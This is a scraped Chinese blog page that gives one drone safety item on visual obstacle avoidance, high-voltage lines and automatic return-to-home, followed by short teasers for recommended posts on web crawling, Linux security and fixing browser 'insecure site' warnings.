15.航空器的视觉避障只有在光照等环境条件满足视觉系统工作要求时才能生效,光照条件特别暗或者特别亮的情况下,请谨慎飞行,即使视觉系统正常工作时,也可能无法精准识别高压线,而且高压线还会影响图传和遥控信号,因此不建议在高压线间飞行,如因电力巡检等工作原因必须在此环境下飞行,建议经专门培训后再进行操作;当航空器记录了返航点并且在定位服务良好的情况下,航空器电池电量不足、遥控器与航空器之间失去通讯信号以及图传信号丢失时,将会触发自动返航,操控员也可主动开启自动返航,航空器将自动返回返航点并降落。

			
		

	





	

		

			

				
					
【Python爬虫实战】网络爬虫完整指南:HTTP/HTTPS协议与爬虫安全实践

				
			

			

				

					小火龙的博客
				

				

					10-29
					
					1161
					
				

			

		

		

			
				
是互联网的核心协议之一,用于在客户端(如浏览器或爬虫)和服务器之间传输数据。HTTP协议定义了请求和响应的格式,帮助不同设备进行信息交换,例如我们在浏览网页时,浏览器就是通过HTTP向服务器请求页面内容,然后显示在用户面前。是HTTP协议的升级版,通过SSL/TLS加密协议增强了数据传输的安全性。HTTPS协议会在数据传输过程中对数据进行加密,防止中途被拦截或篡改,因此在保护用户隐私和敏感信息方面起到了重要作用。

			
		

	





	

		

			

				
					
Linux系统安全配置

				
			

			

				

					qq_24442273的博客
				

				

					10-28
					
					934
					
				

			

		

		

			
				
【代码】Linux系统安全配置。

			
		

	





	

		

			

				
					
网站被浏览器提示不安全怎么办?——附解决方案

				
			

			

				

					2403_87921797的博客
				

				

					10-30
					
					564
					
				

			

		

		

			
				
首先,确保你的网站使用了有效的SSL证书。使用安全扫描工具来检测潜在的安全问题。记住,网站安全不仅关乎用户体验,也直接影响到网站的搜索排名和信誉。:在解决问题期间,通过社交媒体、电子邮件等方式通知用户你的网站正在进行安全维护,以减少用户的不信任感。:如果你已经解决了安全问题,可以向浏览器提供商提交重新审查的请求,以便他们更新你的网站安全状态。:即使问题得到解决,也需要持续监控网站的安全状态,防止未来再次出现安全问题。:确保你的网站托管服务提供商具有良好的安全记录,能够提供必要的安全支持。

			
		

	





	

		

			

				
					

				
			

			

				

					
				

			

		

		

			
				

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值